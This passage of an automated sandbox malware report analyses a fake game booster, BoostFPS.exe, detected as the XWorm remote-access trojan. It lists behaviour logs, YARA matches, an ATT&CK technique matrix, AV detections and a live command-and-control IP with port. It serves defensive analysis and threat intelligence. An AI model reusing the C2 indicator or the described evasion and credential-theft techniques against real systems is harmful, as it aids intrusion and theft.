                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                  Source: C:\Users\user\Desktop\BoostFPS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: svchost.exe, 00000004.00000002.3306505266.0000000000677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3323919108.000000001C6BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: 0.2.BoostFPS.exe.250c800.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.0.svchost.exe.1a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BoostFPS.exe.251fc40.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3313721624.00000000025EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: BoostFPS.exe PID: 5252, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7160, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: 0.2.BoostFPS.exe.250c800.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.0.svchost.exe.1a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BoostFPS.exe.251fc40.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3313721624.00000000025EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: BoostFPS.exe PID: 5252, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7160, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts12
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		OS Credential Dumping1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		112
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory23
                  System Information Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell                  		1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		21
                  Obfuscated Files or Information                  		Security Account Manager541
                  Security Software Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron21
                  Registry Run Keys / Startup Folder                  		21
                  Registry Run Keys / Startup Folder                  		22
                  Software Packing                  		NTDS2
                  Process Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets151
                  Virtualization/Sandbox Evasion                  		SSHKeylogging12
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Masquerading                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                  Virtualization/Sandbox Evasion                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                  Process Injection                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559236 Sample: BoostFPS.exe Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 56 ip-api.com 2->56 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 17 other signatures 2->68 9 BoostFPS.exe 4 2->9         started        13 svchost.exe 2->13         started        15 svchost.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 file5 52 C:\Users\user\AppData\Roaming\svchost.exe, PE32 9->52 dropped 54 C:\Users\user\AppData\...\BoostFPS.exe.log, CSV 9->54 dropped 80 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->80 82 Drops PE files with benign system names 9->82 19 svchost.exe 1 5 9->19         started        23 cmd.exe 1 9->23         started        signatures6 process7 dnsIp8 58 45.141.27.248, 49979, 7777 SPECTRAIPSpectraIPBVNL Netherlands 19->58 60 ip-api.com 208.95.112.1, 49704, 80 TUT-ASUS United States 19->60 70 Antivirus detection for dropped file 19->70 72 System process connects to network (likely due to code injection or exploit) 19->72 74 Multi AV Scanner detection for dropped file 19->74 76 8 other signatures 19->76 25 powershell.exe 23 19->25         started        28 powershell.exe 23 19->28         started        30 powershell.exe 19->30         started        40 2 other processes 19->40 32 conhost.exe 23->32         started        34 cmd.exe 1 23->34         started        36 mode.com 1 23->36         started        38 chcp.com 1 23->38         started        signatures9 process10 signatures11 78 Loading BitLocker PowerShell Module 25->78 42 conhost.exe 25->42         started        44 conhost.exe 28->44         started        46 conhost.exe 30->46         started        48 conhost.exe 40->48         started        50 conhost.exe 40->50         started        process12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  BoostFPS.exe66%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                  BoostFPS.exe100%AviraTR/Dropper.Gen
                  BoostFPS.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\svchost.exe100%AviraTR/Spy.Gen
                  C:\Users\user\AppData\Roaming\svchost.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\svchost.exe84%ReversingLabsByteCode-MSIL.Ransomware.CryptConsole

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://wwwft.com/pkiops/crProPCA2011_2011-l0a0%Avira URL Cloudsafe
                  https://Token.dll0%Avira URL Cloudsafe
                  https://go.microsoft.co_0%Avira URL Cloudsafe
                  http://wwoft.com/pkiops/c0%Avira URL Cloudsafe
                  45.141.27.2480%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    45.141.27.248true
                    • Avira URL Cloud: safe
                    		unknown
                    http://ip-api.com/line/?fields=hostingfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.2196208594.000001DBF0263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2291803371.000002243E563000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2447582953.0000021BCFCB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.2179167608.000001DBE041A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
